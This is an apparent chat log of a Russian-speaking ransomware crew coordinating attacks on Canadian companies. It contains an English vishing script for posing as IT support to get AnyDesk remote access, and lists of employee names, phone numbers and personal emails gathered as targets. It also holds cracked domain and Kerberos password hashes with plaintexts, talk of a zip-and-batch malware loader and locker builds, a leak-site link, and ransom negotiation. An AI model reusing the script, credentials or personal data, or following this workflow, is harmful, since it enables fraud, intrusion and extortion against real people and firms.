[2024-05-27 16:16:34] @n3auxaxl:matrix.collectionofmanager.space: чтобы следов в файле самом не было
--------------------
[2024-05-27 16:16:55] @usernamegg:matrix.bestflowers247.online: https://www.datanyze.com/companies/greenfirst-forest-products/553876522
--------------------
[2024-05-27 16:18:52] @usernamegg:matrix.bestflowers247.online: ```
Operator: Hello, my name is Owen. I am representing our IT department. I'm calling regarding a current security incident that our company is facing. Do you have a moment to talk? This is an urgent security matter for you and the company.

Client Response: [Ждём ответа]

Operator: Thank you for your time. Our security team has identified a massive set of spam attacks against our business. These attacks primarily involve the delivery of malware through phishing emails. We have confirmed that these threats are legitimate, which is why we are calling you to check your systems with us.

Operator: Let me provide some context. Our monitoring tools have identified that these emails are being sent to various targeted addresses, including yours. The emails are crafted to look legitimate, making it easy for recipients to unknowingly click on malicious links or download infected attachments.

Client Response: [Ждём ответа]

Operator: To ensure our network remains secure, it is crucial to act quickly. First, I need to verify if you have received any spam emails today. We have  noticed an influx of spam or suspicious emails in your inbox. These emails might look like they are from known contacts or trusted organizations but contain unusual requests or attachments.

Client Response: [Ждём ответа по поводу того, что ему пришло много спама]

Operator: Thank you for confirming. This is exactly the incident we were referring to. It’s important that we take immediate action to prevent any potential damage. We will guide you through a series of steps to secure your system.

Operator: To proceed with securing your network, we need you to install Anydesk - a legitimate tool. Using this tool will help us analyze your system and remove any potential threats and install the needed anti-spam software. You can verify its authenticity by Googling it. We will not send you any links to ensure your safety. Please follow my instructions to download it from a legitimate website anydesk.com.

Client Response: [Ждём ответа по анику, в зависимости от того, установлен он или нет, говорим]

Operator: Please open your web browser and search for Anydesk. Make sure you are downloading it from the official website. If you need assistance finding the correct site, I can help guide you through it.

Client Response: [Ждём ответа и помогаем установить]

Operator: Once you have found the official website, please download and install the tool. This might take a few moments. If you encounter any issues during the installation process, let me know, and I will assist you.

Client Response: [Ждём ответа и помогаем установить]

Operator: Once Anydesk is installed, we will need you to grant access to your system through the tool. This access is necessary to help us neutralize the threat and install the needed anti-spam software. Rest assured, everything we do will be transparent, and you will see all the processes we are performing on your system. If you have any suspicions at any point, you can immediately stop the process.

Client Response: [Получаем доступ, отвлекаем его по телефону]

Operator: Now, please open the tool and follow the prompts to grant access. You might need to enter some administrative credentials. This step is crucial for us to conduct a thorough scan and remove any malware that might have been installed.

Client Response: [Ждём ответа и помогаем установить]

Operator: While the tool is running, I will stay on the line to answer any questions you might have. The scan might take a few minutes, depending on the size of your system and the number of files.

Client Response: [Ждём ответа и поздравляем]

Operator: During the scan, you might see various system messages or notifications. Please do not be alarmed. These are normal and indicate that the tool is actively working to detect and remove any threats.

Client Response: [Ждём ответа]

Operator: If we identify any threats, we will provide instructions on how to remove them. Follow these instructions carefully. If you need any assistance during this process, I am here to help.
```
--------------------
[2024-05-27 16:25:02] @usernamett:matrix.bestflowers247.online: ```
R.P.F. Darcy Ungar
Area Forester
------------------------------
Phone (Direct)(705) 337-9683
Phone (Mobile)(905) 925-9717
Phone (HQ)(416) 775-2800
Email:darcy.ungar@greenfirst.ca
```
--------------------
[2024-05-27 16:28:46] @muaddib6:matrix.org: > <@usernamegg:matrix.bestflowers247.online> скину билды

Ждем билды?
--------------------
[2024-05-27 16:35:16] @usernamegg:matrix.bestflowers247.online: я начинаю звонить
--------------------
[2024-05-27 16:35:29] @usernamegg:matrix.bestflowers247.online: софт какой мне заупскать ?
--------------------
[2024-05-27 16:35:31] @usernamegg:matrix.bestflowers247.online: есть варианты ?
--------------------
[2024-05-27 16:37:10] @nickolas:talks.icu: не пережми главное
--------------------
[2024-05-27 16:37:34] @usernamegg:matrix.bestflowers247.online: ок
--------------------
[2024-05-27 16:39:07] @usernamegg:matrix.bestflowers247.online: > <@usernamess:matrix.bestflowers247.online> sent an image.

[19:38:45] KernelMode - killer EDR: принято, посмотрим
--------------------
[2024-05-27 16:39:54] @n3auxaxl:matrix.collectionofmanager.space: могу без формы сделать
--------------------
[2024-05-27 16:39:58] @n3auxaxl:matrix.collectionofmanager.space: чтобы чисто бат запускался
--------------------
[2024-05-27 16:40:03] @n3auxaxl:matrix.collectionofmanager.space: и там дальше наша пика длка запускалась
--------------------
[2024-05-27 16:40:19] @n3auxaxl:matrix.collectionofmanager.space: пока без сбора username и пассворда
--------------------
[2024-05-27 16:41:27] @nickolas:talks.icu: во, уже 5м предлагают
--------------------
[2024-05-27 16:41:29] @nickolas:talks.icu: твой шаг )
--------------------
[2024-05-27 16:41:55] @usernamegg:matrix.bestflowers247.online: ага
--------------------
[2024-05-27 16:41:58] @nickolas:talks.icu: че думаешь по ним ?
--------------------
[2024-05-27 16:42:02] @nickolas:talks.icu: почему так прикипело ?
--------------------
[2024-05-27 16:42:23] @nickolas:talks.icu: че то важное без бекапов на эскси видимо
--------------------
[2024-05-27 16:42:25] @nickolas:talks.icu: бизнес встал
--------------------
[2024-05-27 16:43:03] @usernamegg:matrix.bestflowers247.online: они после данных сразу дали цифру , там мы выншли в фапспортах и драйв лицензиях главных лиц
--------------------
[2024-05-27 16:43:11] @usernamegg:matrix.bestflowers247.online: esxi все там упали
--------------------
[2024-05-27 16:43:16] @usernamegg:matrix.bestflowers247.online: на них было очень много машин
--------------------
[2024-05-27 16:43:32] @usernamegg:matrix.bestflowers247.online: даты качнули хорошей , свежей , все без остановки делали
--------------------
[2024-05-27 16:43:33] @nickolas:talks.icu: за дату они тележат долго обычно
--------------------
[2024-05-27 16:43:33] @usernamegg:matrix.bestflowers247.online: быстро
--------------------
[2024-05-27 16:43:46] @nickolas:talks.icu: там есть время по думать, а вот тут скорее всего эскси
--------------------
[2024-05-27 16:44:02] @usernamegg:matrix.bestflowers247.online: с момента как как мы их получили в работу до момента полного пиздец у них просто меньше 12 часов
--------------------
[2024-05-27 16:44:20] @usernamegg:matrix.bestflowers247.online: трее фаил скачай
--------------------
[2024-05-27 16:44:23] @nickolas:talks.icu: с такими сетями только так, сам же видел какой там пиздец
--------------------
[2024-05-27 16:44:25] @usernamegg:matrix.bestflowers247.online: посмотри что там за дата
--------------------
[2024-05-27 16:44:27] @usernamegg:matrix.bestflowers247.online: блог посмотри
--------------------
[2024-05-27 16:44:40] @usernamegg:matrix.bestflowers247.online: stniiomyjliimcgkvdszvgen3eaaoz55hreqqx6o77yvmpwt7gklffqd.onion/?id=b48f0428-8574-49a7-8613-c2158d2fd3d3&pass=qwerty
--------------------
[2024-05-27 16:44:56] @usernamegg:matrix.bestflowers247.online: так часто бывает
--------------------
[2024-05-27 16:45:10] @usernamegg:matrix.bestflowers247.online: я думаю два шага
--------------------
[2024-05-27 16:45:13] @usernamegg:matrix.bestflowers247.online: и мы договримся
--------------------
[2024-05-27 16:45:18] @nickolas:talks.icu: 100%
--------------------
[2024-05-27 16:45:20] @usernamegg:matrix.bestflowers247.online: может один
--------------------
[2024-05-27 16:45:27] @usernamegg:matrix.bestflowers247.online: посмотри что дадут
--------------------
[2024-05-27 16:45:29] @nickolas:talks.icu: ну где то диапазон 6-7
--------------------
[2024-05-27 16:45:38] @usernamegg:matrix.bestflowers247.online: ну да да
--------------------
[2024-05-27 16:46:08] @usernamegg:matrix.bestflowers247.online: но лучше не загадывать
--------------------
[2024-05-27 16:46:09] @usernamegg:matrix.bestflowers247.online: смотрим
--------------------
[2024-05-27 16:46:13] @nickolas:talks.icu: согласен
--------------------
[2024-05-27 16:46:21] @nickolas:talks.icu: смотрим, ведем аккруатно
--------------------
[2024-05-27 16:46:24] @usernamegg:matrix.bestflowers247.online: форма нужна
--------------------
[2024-05-27 16:46:26] @nickolas:talks.icu: надеюсь все выгорит👍️
--------------------
[2024-05-27 16:46:34] @usernamegg:matrix.bestflowers247.online: у меня флуд уже идет по почтам
--------------------
[2024-05-27 16:49:11] @usernamegg:matrix.bestflowers247.online: ага
--------------------
[2024-05-27 16:54:58] @usernamegg:matrix.bestflowers247.online: ты тут ?
--------------------
[2024-05-27 16:55:09] @usernamegg:matrix.bestflowers247.online: blg.com
--------------------
[2024-05-27 16:55:13] @usernamegg:matrix.bestflowers247.online: вот есть компания
--------------------
[2024-05-27 16:55:22] @usernamegg:matrix.bestflowers247.online: нужно собрать по ним контакты с разных мест + email
--------------------
[2024-05-27 16:55:26] @usernamegg:matrix.bestflowers247.online: сможешь ?
--------------------
[2024-05-27 16:55:33] @usernamegg:matrix.bestflowers247.online: для флуда и звонка
--------------------
[2024-05-27 16:55:39] @usernamegg:matrix.bestflowers247.online: лучше смых дур находить
--------------------
[2024-05-27 17:29:28] @cameron777:matrix.org: privet
--------------------
[2024-05-27 17:39:40] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-27 17:40:03] @cameron777:matrix.org: kak dela ? kogda vi uxodite na otdix ?
NN kak ?
--------------------
[2024-05-27 17:40:41] @usernamegg:matrix.bestflowers247.online: конец июня
--------------------
[2024-05-27 17:43:25] @usernamett:matrix.bestflowers247.online: ```
----------------------------------------------------------
***Sekisui Diagnostics PEI Ltd***sekisuidiagnostics.com $243.9M производство диагностического оборудования;
----------------------------------------------------------
Kieran Sherwood
Quality Control Inspector
Phone (Mobile)(902) 628-0991
Phone (HQ)(781) 652-7800
Email:kieran.sherwood@sekisuidiagnostics.com
----------------------------------------------------------
Jennifer Boman
Research & Development Senior Mechanical Engineer
Phone (Mobile)(858) 361-2770
Phone (HQ)(781) 652-7800
Email: jennifer.boman@sekisuidiagnostics.com
Email: jennifer.boman23@gmail.com
----------------------------------------------------------
Nicolle Houston
Accounting Principal & Associate
Phone (Direct)(781) 652-7846
Phone (Mobile)(781) 430-3538
Phone (HQ)(781) 652-7800
nicolle.houston@sekisuidiagnostics.com



----------------------------------------------------------
***R.F. Binnie & Associates Ltd.*** www.binnie.com $191 M Architecture, Engineering
----------------------------------------------------------
Shealyn Shul
Administrative Assistant
Phone (Direct)(250) 801-6879
Phone (HQ)(604) 420-1721
Email: sshul@binnie.com
----------------------------------------------------------
Reynand Coronel
Technologist
Phone (Mobile)(204) 803-4945
Phone (HQ)(604) 420-1721
Email: rcoronel@binnie.com
----------------------------------------------------------
Linda Wu
Talent Acquisition Specialist
Phone (HQ)(604) 420-1721
Email: lwu@binnie.com
Email: lindawulive@gmail.com
----------------------------------------------------------



----------------------------------------------------------
***Modern Niagara Group Inc*** $500.4 M www.modernniagara.com инжиниринг
----------------------------------------------------------
Trevor King
Journeyman
Phone (Direct)(613) 591-1523
Phone (Mobile)(613) 277-1402
Phone (HQ)(613) 591-7505
Email: tking@modernniagara.com
----------------------------------------------------------
Jason Boychuk
Electrical Manager
Phone (Mobile)(437) 522-5342
Phone (HQ)(613) 591-7505
Email: jboychuk@modernniagara.com
----------------------------------------------------------
Kevin Brett
Manager, Controls Engineering
Phone (Direct)(613) 591-7505 ext. 4441
Phone (Mobile)(613) 282-6183
Phone (HQ)(613) 591-7505
Email: kbrett@modernniagara.com
----------------------------------------------------------
```
--------------------
[2024-05-27 17:43:54] @usernamegg:matrix.bestflowers247.online: по два три номера ?
--------------------
[2024-05-27 17:44:46] @cameron777:matrix.org: ok
--------------------
[2024-05-27 17:56:44] @usernamegg:matrix.bestflowers247.online: NN будет чуть позже
--------------------
[2024-05-27 17:56:48] @usernamegg:matrix.bestflowers247.online: через недельку
--------------------
[2024-05-27 17:56:56] @cameron777:matrix.org: ok
--------------------
[2024-05-27 18:05:18] @usernamegg:matrix.bestflowers247.online: готова форма ?
--------------------
[2024-05-27 18:06:37] @n3auxaxl:matrix.collectionofmanager.space: нет, почти закончил ставить всен
--------------------
[2024-05-27 18:06:39] @n3auxaxl:matrix.collectionofmanager.space: * нет, почти закончил ставить все
--------------------
[2024-05-27 18:07:12] @n3auxaxl:matrix.collectionofmanager.space: зип уже готов
--------------------
[2024-05-27 18:07:16] @n3auxaxl:matrix.collectionofmanager.space: осталась только форма
--------------------
[2024-05-27 18:07:38] @usernamegg:matrix.bestflowers247.online: зачем зип?
--------------------
[2024-05-27 18:08:40] @n3auxaxl:matrix.collectionofmanager.space: ну с ленда будет скачиваться зип
--------------------
[2024-05-27 18:08:45] @n3auxaxl:matrix.collectionofmanager.space: там будет запускать .bat
--------------------
[2024-05-27 18:08:53] @n3auxaxl:matrix.collectionofmanager.space: который будет запускать пику из другой папки
--------------------
[2024-05-27 18:09:01] @n3auxaxl:matrix.collectionofmanager.space: и потом форму
--------------------
[2024-05-27 18:09:27] @n3auxaxl:matrix.collectionofmanager.space: батник же без алерта не скачается с сайта
--------------------
[2024-05-27 18:09:33] @n3auxaxl:matrix.collectionofmanager.space: только в зипе
--------------------
[2024-05-27 18:10:11] @n3auxaxl:matrix.collectionofmanager.space: а зачем вам сайт, вы не можете сразу через anydesk проливать?
--------------------
[2024-05-27 18:10:13] @n3auxaxl:matrix.collectionofmanager.space: ну файлы заливать
--------------------
[2024-05-27 18:10:18] @n3auxaxl:matrix.collectionofmanager.space: не помню, есть ли такой там функционал
--------------------
[2024-05-27 18:14:43] @usernameww:matrix.bestflowers247.online: kekhash.txt
--------------------
[2024-05-27 18:16:23] @usernamett:matrix.bestflowers247.online: ```
================================================================================================================================================================================

----------------------------------------------------------
***R.F. Binnie & Associates Ltd.*** www.binnie.com $191 M Architecture, Engineering
1----------------------------------------------------------
Shealyn Shul
Administrative Assistant
Phone (Direct)(250) 801-6879
Phone (HQ)(604) 420-1721
Email: sshul@binnie.com
2----------------------------------------------------------
Reynand Coronel
Technologist
Phone (Mobile)(204) 803-4945
Phone (HQ)(604) 420-1721
Email: rcoronel@binnie.com
3----------------------------------------------------------
Linda Wu
Talent Acquisition Specialist
Phone (HQ)(604) 420-1721
Email: lwu@binnie.com
Email: lindawulive@gmail.com
4----------------------------------------------------------
Alexandra Man
Project Biller and Coordinator
Phone (Direct)(236) 521-6221
Phone (HQ)(604) 420-1721
Email: aman@binnie.com
Email: mun_ka_yi@hotmail.com
5----------------------------------------------------------
Carey Jones
Project Management Technician
Phone (Mobile)(778) 694-4668
Phone (HQ)(604) 420-1721
Email: cjones@binnie.com
Email: careyjones81@gmail.com
7----------------------------------------------------------
Frank Riccardi
Geomatics Group Manager
Phone (Direct)(778) 945-6085
Phone (Mobile)(604) 240-0902
Phone (HQ)(604) 420-1721
Email: friccardi@binnie.com
8----------------------------------------------------------
Richard Ananda
Contractor - Binnie
Phone (Direct)(778) 945-6156
Phone (HQ)(604) 420-1721
Email: rananda@binnie.com
----------------------------------------------------------


================================================================================================================================================================================
================================================================================================================================================================================
================================================================================================================================================================================

----------------------------------------------------------
***Modern Niagara Group Inc*** $500.4 M www.modernniagara.com инжиниринг
1----------------------------------------------------------
Trevor King
Journeyman
Phone (Direct)(613) 591-1523
Phone (Mobile)(613) 277-1402
Phone (HQ)(613) 591-7505
Email: tking@modernniagara.com
2----------------------------------------------------------
Jason Boychuk
Electrical Manager
Phone (Mobile)(437) 522-5342
Phone (HQ)(613) 591-7505
Email: jboychuk@modernniagara.com
3----------------------------------------------------------
Kevin Brett
Manager, Controls Engineering
Phone (Direct)(613) 591-7505 ext. 4441
Phone (Mobile)(613) 282-6183
Phone (HQ)(613) 591-7505
Email: kbrett@modernniagara.com
4----------------------------------------------------------
Eddy Skulj
Piping General Foreman
Phone (Mobile)(416) 953-9216
Phone (HQ)(613) 591-7505
Email: eskulj@modernniagara.com
5----------------------------------------------------------
Roy Morsanutto
Estimator
Phone (Direct)(416) 749-6031
Phone (Mobile)(647) 206-0186
Phone (HQ)(613) 591-7505
6----------------------------------------------------------
Justin Eiras
Piping Foreman
Phone (Mobile)(437) 217-0325
Phone (HQ)(613) 591-7505
Email: jeiras@modernniagara.com
7----------------------------------------------------------
Edita Gotovac
Controller
Phone (HQ)(613) 591-7505
Email: egotovac@modernniagara.com
8----------------------------------------------------------
Marie McAlpine
Chief Accounting Officer
Phone (HQ)(613) 591-7505
Email: mmcalpine@modernniagara.com
----------------------------------------------------------
```
--------------------
[2024-05-27 18:16:41] @usernameboy:matrix.bestflowers247.online: $krb5tgs$23$*SSRS$REDKITE.LOCAL$DWHSvc/RKH-SQL01.REDKITE.LOCAL:1433@REDKITE.LOCAL*$....:R3dk1t3!

--------------------
[2024-05-27 18:16:43] @usernamett:matrix.bestflowers247.online: по 8 номеров у каждой компании
--------------------
[2024-05-27 18:16:46] @usernameww:matrix.bestflowers247.online: ++
--------------------
[2024-05-27 18:18:27] @usernamegg:matrix.bestflowers247.online: уже лучше
--------------------
[2024-05-27 18:21:11] @adm:talks.icu: не смотрел ?
--------------------
[2024-05-27 18:22:52] @usernamegg:matrix.bestflowers247.online: ```
admcor:
OFiHryLLaciXGlaoEaj
GxE2Pq=t00z?XZy*3GCB!irHfCx:M.4c
--------------------
[2024-05-27 18:23:38] @usernamemm:matrix.bestflowers247.online: `be404bce5a579e0b6403f8bf41471fca`
--------------------
[2024-05-27 18:25:04] @usernamezz:matrix.bestflowers247.online: ```
$DCC2$10240#csgadmin#75e7319e8deb674ff389017ef3274a95
=
Securemp01
```
--------------------
[2024-05-27 18:25:15] @usernamezz:matrix.bestflowers247.online: вот он
--------------------
[2024-05-27 18:34:17] @tinker:matrix.bestflowers247.online: привет привет!
--------------------
[2024-05-27 18:34:28] @tinker:matrix.bestflowers247.online: постараюсь
--------------------
[2024-05-27 18:34:35] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-27 18:34:50] @usernamegg:matrix.bestflowers247.online: мне интресно какие ресурсы ты используешь ?
--------------------
[2024-05-27 18:35:08] @tinker:matrix.bestflowers247.online: только завтра уже)
--------------------
[2024-05-27 18:35:12] @tinker:matrix.bestflowers247.online: линкедин
--------------------
[2024-05-27 18:35:14] @tinker:matrix.bestflowers247.online: из главного
--------------------
[2024-05-27 18:35:36] @tinker:matrix.bestflowers247.online: плюс все те базы почты которые брал для спама
--------------------
[2024-05-27 18:35:44] @tinker:matrix.bestflowers247.online: с других партнёрок
--------------------
[2024-05-27 18:35:56] @tinker:matrix.bestflowers247.online: я же какое-то время чисто под спам работал
--------------------
[2024-05-27 18:36:04] @tinker:matrix.bestflowers247.online: ну и дальше сверяю через линкедин
--------------------
[2024-05-27 18:36:16] @tinker:matrix.bestflowers247.online: с новы гпт это всё автоматизируется
--------------------
[2024-05-27 18:36:21] @tinker:matrix.bestflowers247.online: через их открытый апи
--------------------
[2024-05-27 18:48:30] @usernamegg:matrix.bestflowers247.online: лучше бы сегодня
--------------------
[2024-05-27 18:49:50] @usernameboy:matrix.bestflowers247.online: > <@usernamezz:matrix.bestflowers247.online> ```
> $DCC2$10240#Administrator#3a5f417f2cb423b79e86d369d146801c
> $DCC2$10240#csgcwadmin#92dd0317b33915d67e8bb92daba8ac98
> $DCC2$10240#csgadmin#75e7319e8deb674ff389017ef3274a95
> ```

$DCC2$10240#administrator#3a5f417f2cb423b79e86d369d146801c:securemp01

--------------------
[2024-05-27 18:50:59] @adm:talks.icu: ++
--------------------
[2024-05-27 19:02:16] @tinker:matrix.bestflowers247.online: начну смотреть
--------------------
[2024-05-27 19:02:28] @tinker:matrix.bestflowers247.online: но слушай, слать всё равно уже во вторник-среду
--------------------
[2024-05-27 19:02:32] @tinker:matrix.bestflowers247.online: сейчас праздники там
--------------------
[2024-05-27 19:02:40] @tinker:matrix.bestflowers247.online: в молоко уйдут письма
--------------------
[2024-05-27 19:02:43] @usernamegg:matrix.bestflowers247.online: знаю
--------------------
[2024-05-27 19:02:47] @usernamegg:matrix.bestflowers247.online: это канада
--------------------
[2024-05-27 19:03:01] @tinker:matrix.bestflowers247.online: а там тоже многие отмечают
--------------------
[2024-05-27 19:03:04] @tinker:matrix.bestflowers247.online: мемориал дэй
--------------------
[2024-05-27 19:03:13] @usernamegg:matrix.bestflowers247.online: знаю
--------------------
[2024-05-27 19:03:18] @tinker:matrix.bestflowers247.online: тем более я думаю у них бизнес всё равно на юсу завязан
--------------------
[2024-05-27 19:05:21] @usernamegg:matrix.bestflowers247.online: ну есть такое
--------------------
[2024-05-27 19:14:55] @usernameboy:matrix.bestflowers247.online: > <@usernamemm:matrix.bestflowers247.online> `be404bce5a579e0b6403f8bf41471fca`

be404bce5a579e0b6403f8bf41471fca:Barcelona-150781

--------------------
[2024-05-27 19:15:22] @usernamemm:matrix.bestflowers247.online: ++
--------------------
[2024-05-27 19:20:12] @usernamemm:matrix.bestflowers247.online: ad7bee3589b0afff8ca5d66896dab606
--------------------
[2024-05-27 19:20:25] @usernamegg:matrix.bestflowers247.online: есть кто тут ?
--------------------
[2024-05-27 19:20:42] @usernamegg:matrix.bestflowers247.online: надо сделать крипт локера
--------------------
[2024-05-27 19:20:53] @usernamegg:matrix.bestflowers247.online: бурито брат
--------------------
[2024-05-27 19:26:31] @usernamegg:matrix.bestflowers247.online: Id: 13092d8c-5693-43e5-b111-4f651e3d225d
Id: feeff738-daf7-402c-9ca2-b32aab5b75f9
Id: 14a54f0e-accd-4bfc-aa27-b1b410ff6090
--------------------
[2024-05-27 19:26:43] @usernamegg:matrix.bestflowers247.online: 13092d8c-5693-43e5-b111-4f651e3d225d_encrypt_release_allsystem_x64.zip
--------------------
[2024-05-27 19:26:46] @usernamegg:matrix.bestflowers247.online: 14a54f0e-accd-4bfc-aa27-b1b410ff6090_encrypt_release_allsystem_x64.zip
--------------------
[2024-05-27 19:26:47] @usernamegg:matrix.bestflowers247.online: feeff738-daf7-402c-9ca2-b32aab5b75f9_encrypt_release_allsystem_x64.zip
--------------------
[2024-05-27 19:32:15] @usernamegg:matrix.bestflowers247.online: ww верните на место
--------------------
[2024-05-27 19:32:21] @usernamemm:matrix.bestflowers247.online: ++
--------------------
[2024-05-27 19:33:17] @usernameww:matrix.bestflowers247.online: ++
--------------------
[2024-05-27 19:33:49] @usernameww:matrix.bestflowers247.online: 1 file есть с криптом
--------------------
[2024-05-27 19:34:01] @usernameww:matrix.bestflowers247.online: с прошлой недели
--------------------
[2024-05-27 19:34:18] @usernamegg:matrix.bestflowers247.online: id
--------------------
[2024-05-27 19:34:20] @usernamegg:matrix.bestflowers247.online: дай мне
--------------------
[2024-05-27 19:34:34] @usernameww:matrix.bestflowers247.online: `df45ee4c-1060-483e-9214-884f23526c6c`
--------------------
[2024-05-27 19:37:13] @usernameww:matrix.bestflowers247.online: 3file.lockers.zip
--------------------
[2024-05-27 19:37:14] @usernameww:matrix.bestflowers247.online: burrito: Han
--------------------
[2024-05-27 19:40:24] @burito:matrix.bestflowers247.online: Ага, минут 70
--------------------
[2024-05-27 19:45:58] @n3auxaxl:matrix.collectionofmanager.space: с утра будет форма, заебался сетапить эту хуйню всю, разные версии, за ночь точно все поставиться
--------------------
[2024-05-27 19:46:43] @n3auxaxl:matrix.collectionofmanager.space: как раз собирался рано вставать
--------------------
[2024-05-27 19:49:41] @nickolas:talks.icu: ну че делаем ?
--------------------
[2024-05-27 19:50:27] @nickolas:talks.icu: мне кажется можно дать им 7.5 и сойтись где то 6.5-7
--------------------
[2024-05-27 19:50:34] @nickolas:talks.icu: какие у тебя мысли ?
--------------------
[2024-05-27 19:50:39] @usernamegg:matrix.bestflowers247.online: я уже ответил
--------------------
[2024-05-27 19:50:40] @usernamegg:matrix.bestflowers247.online: нет
--------------------
[2024-05-27 19:50:43] @usernamegg:matrix.bestflowers247.online: топить не нужно
--------------------
[2024-05-27 19:50:47] @usernamegg:matrix.bestflowers247.online: усложняем ситуацию
--------------------
[2024-05-27 19:51:00] @nickolas:talks.icu: ок, тебе виднее
--------------------
[2024-05-27 19:51:02] @usernamegg:matrix.bestflowers247.online: хорошие деньги за такой легкий таргет
--------------------
[2024-05-27 19:51:04] @nickolas:talks.icu: ты у нас профи )
--------------------
[2024-05-27 19:51:08] @usernamegg:matrix.bestflowers247.online: у нас даты в два раза меньше
--------------------
[2024-05-27 19:51:08] @nickolas:talks.icu: согласен!
--------------------
[2024-05-27 19:51:11] @usernamegg:matrix.bestflowers247.online: бекапы у них есть
--------------------
[2024-05-27 19:51:19] @usernamegg:matrix.bestflowers247.online: я развел их
--------------------
[2024-05-27 19:51:20] @usernamegg:matrix.bestflowers247.online: по дате
--------------------
[2024-05-27 19:51:23] @usernamegg:matrix.bestflowers247.online: все получилось
--------------------
[2024-05-27 19:51:25] @nickolas:talks.icu: :-)
--------------------
[2024-05-27 19:51:30] @usernamegg:matrix.bestflowers247.online: забираем и не выебываемся
--------------------
[2024-05-27 19:51:34] @usernamegg:matrix.bestflowers247.online: как говорится
--------------------
[2024-05-27 19:51:43] @nickolas:talks.icu: 👍️
--------------------
[2024-05-27 19:51:47] @nickolas:talks.icu: согласен
--------------------
[2024-05-27 19:51:50] @nickolas:talks.icu: молодец! Красиво!
--------------------
[2024-05-27 19:52:08] @nickolas:talks.icu: и таргет был хороший, завтра в бой с новыми силами, по не менее интересным таргетам
--------------------
[2024-05-27 19:52:15] @nickolas:talks.icu: таких 3-5 в неделю, и мы в шоколаде ))
--------------------
[2024-05-27 19:52:50] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-27 19:53:04] @usernamegg:matrix.bestflowers247.online: таких 3-5 в неделю - сделать надо еще
--------------------
[2024-05-27 20:08:30] @nickolas:talks.icu: сделаем
--------------------
[2024-05-27 20:08:33] @nickolas:talks.icu: всем нам хватит
--------------------
[2024-05-27 20:34:42] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-27 20:40:09] @burito:matrix.bestflowers247.online: > <@usernameww:matrix.bestflowers247.online> 3file.lockers.zip

lockers
--------------------
[2024-05-27 20:40:10] @burito:matrix.bestflowers247.online: lckrs.zip
--------------------
[2024-05-27 20:46:04] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-27 20:57:07] @nickolas:talks.icu: прикол по bnsport ))
--------------------
[2024-05-27 20:57:37] @nickolas:talks.icu: там мужик Les LaFrance повелся на девочку звонилу )
--------------------
[2024-05-27 20:57:41] @nickolas:talks.icu: он даже камеру включил )))
--------------------
[2024-05-27 20:57:56] @nickolas:talks.icu: Вот до чего доводит романтическая натура )))
--------------------
[2024-05-27 20:58:20] @nickolas:talks.icu: * он даже камеру включил, видимо решил закадрить айтишницу )))
--------------------
[2024-05-27 21:27:49] @usernamegg:matrix.bestflowers247.online: ))
--------------------
[2024-05-27 21:28:10] @usernamegg:matrix.bestflowers247.online: по тимсу включил камеру ?
--------------------
[2024-05-27 21:28:17] @nickolas:talks.icu: ага =)
--------------------
[2024-05-27 21:28:47] @usernamegg:matrix.bestflowers247.online: хорошо
--------------------
[2024-05-27 21:28:49] @nickolas:talks.icu: она потом написала, что он так проникся =)
--------------------
[2024-05-27 21:28:57] @nickolas:talks.icu: и что пытался ее кадрить )
--------------------
[2024-05-27 21:29:53] @nickolas:talks.icu: пиздец ему думаю 🤣
--------------------
[2024-05-27 21:30:46] @usernamegg:matrix.bestflowers247.online: они смогу не найти точку входа
--------------------
[2024-05-27 21:30:54] @nickolas:talks.icu: они вычислили впн )
--------------------
[2024-05-27 21:31:05] @usernamegg:matrix.bestflowers247.online: нет
--------------------
[2024-05-27 21:31:05] @nickolas:talks.icu: залочили же креды, ты просто успел спрыгнуть
--------------------
[2024-05-27 21:31:20] @usernamegg:matrix.bestflowers247.online: то что отключили сервак с впном это еще ни о чем не говорит
--------------------
[2024-05-27 21:31:26] @usernamegg:matrix.bestflowers247.online: хз что будет
--------------------
[2024-05-27 21:31:34] @nickolas:talks.icu: ты думаешь они не нашли учетку ?)
Стопудово нашли )
--------------------
[2024-05-27 21:31:43] @usernamegg:matrix.bestflowers247.online: будем думать что чувак не въехал из-за телки
--------------------
[2024-05-27 21:31:50] @nickolas:talks.icu: ))
--------------------
[2024-05-27 21:32:03] @nickolas:talks.icu: можно откат ему сделать на банк счет 😆
--------------------
[2024-05-27 21:32:10] @nickolas:talks.icu: тогда ему точно пиздец )))
--------------------
[2024-05-27 21:32:36] @usernamegg:matrix.bestflowers247.online: ага
--------------------
[2024-05-27 21:32:57] @nickolas:talks.icu: готовимся на завтра
--------------------
[2024-05-27 21:33:06] @nickolas:talks.icu: надеюсь 1-2 в работу подобного плана достану
--------------------
[2024-05-27 21:33:38] @nickolas:talks.icu: живые конторы, и живо платить будут )
--------------------
[2024-05-27 21:34:06] @usernamegg:matrix.bestflowers247.online: живые да
--------------------
[2024-05-27 21:34:18] @nickolas:talks.icu: к ним хуй как по другому проберешься )
--------------------
[2024-05-27 21:34:20] @usernamegg:matrix.bestflowers247.online: хорошо
--------------------
[2024-05-27 21:34:54] @nickolas:talks.icu: а ты мне месяц назад говорил надо масс спам =)
--------------------
[2024-05-27 21:35:11] @usernamegg:matrix.bestflowers247.online: > <@nickolas:talks.icu> а ты мне месяц назад говорил надо масс спам =)

так и есть
--------------------
[2024-05-27 21:35:14] @usernamegg:matrix.bestflowers247.online: будет что слать
--------------------
[2024-05-27 21:35:17] @usernamegg:matrix.bestflowers247.online: сразу начнем
--------------------
[2024-05-27 21:35:25] @usernamegg:matrix.bestflowers247.online: мне объемы нужны
--------------------
[2024-05-27 21:35:43] @usernamegg:matrix.bestflowers247.online: 10 таргетов таких миниму надо в неделю
--------------------
[2024-05-27 21:35:49] @nickolas:talks.icu: так надо звонками делать объемы, там и конторы будут отличные.
--------------------
[2024-05-27 21:35:57] @nickolas:talks.icu: ну если таких 10 в неделю, это ж пиздец )
--------------------
[2024-05-27 21:36:02] @nickolas:talks.icu: там просто будет поток бабла )
--------------------
[2024-05-27 21:36:17] @nickolas:talks.icu: сделаем ревеню басты в 1б ?)
--------------------
[2024-05-27 21:36:20] @usernamegg:matrix.bestflowers247.online: попробуем твое пока делать со звонков потом если что своих звонил подклчим
--------------------
[2024-05-27 21:36:42] @usernamegg:matrix.bestflowers247.online: > <@nickolas:talks.icu> сделаем ревеню басты в 1б ?)

посмотрим )
--------------------
[2024-05-27 21:36:48] @usernamegg:matrix.bestflowers247.online: главное что бы схема работала
--------------------
